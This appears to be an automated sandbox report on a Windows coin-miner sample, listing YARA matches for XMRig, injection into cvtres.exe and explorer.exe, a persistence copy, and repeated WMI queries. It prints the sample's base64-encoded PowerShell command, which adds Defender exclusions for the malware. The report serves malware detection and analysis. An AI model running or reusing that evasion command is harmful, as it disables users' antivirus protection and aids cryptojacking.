Source: 7.3.cvtres.exe.171d47d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 7.3.cvtres.exe.171d47d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000007.00000003.2149800904.00000171D47D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000007.00000003.2149800904.00000171D47D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 00000007.00000003.2149800904.00000171D47D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: Process Memory Space: cvtres.exe PID: 7216, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25

Source: file.exe, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: file.exe, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: file.exe, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: WindosCPUsystem.exe.0.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: WindosCPUsystem.exe.0.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: WindosCPUsystem.exe.0.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.file.exe.1fba7cf0000.4.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.file.exe.1fba7cf0000.4.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.file.exe.1fba7cf0000.4.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.file.exe.1fba7cf0000.4.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 0.2.file.exe.1fba7cf0000.4.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.file.exe.1fba7cf0000.4.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.file.exe.1fba7cf0000.4.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.file.exe.1fba7cf0000.4.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.file.exe.1fba7cf0000.4.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.1fba7cf0000.4.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: orupcopicsyv.sys.7.dr

Binary string: \Device\WinRing0_1_2_0

Source: file.exe, WindosCPUsystem.exe.0.dr	Binary or memory string: .sln
Source: file.exe, WindosCPUsystem.exe.0.dr	Binary or memory string: .csproj.css
Source: file.exe, WindosCPUsystem.exe.0.dr	Binary or memory string: .vbproj.vbs

Source: classification engine

Classification label: mal100.evad.mine.winEXE@34/102@24/9

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5412:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4vkvea4g.ob5.ps1

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Process created: C:\Windows\explorer.exe			Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 23%

Source: file.exe

String found in binary or memory: .aiff.airwapplication/vnd.adobe.air-application-installer-package+zip

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABXAGkAbgBkAG8AcwBDAFAAVQBzAHkAcwB0AGUAbQAuAGUAeABlAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Process "https://google.com"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Process created: C:\Windows\explorer.exe explorer.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe C:\Users\user\AppData\Roaming\WindosCPUsystem.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://google.com/
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1920,i,4819257383897995677,4500115031677660423,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Process "https://google.com"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABXAGkAbgBkAG8AcwBDAFAAVQBzAHkAcwB0AGUAbQAuAGUAeABlAA==	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Process "https://google.com"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://google.com/	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Process created: C:\Windows\explorer.exe explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Process "https://google.com"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1920,i,4819257383897995677,4500115031677660423,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
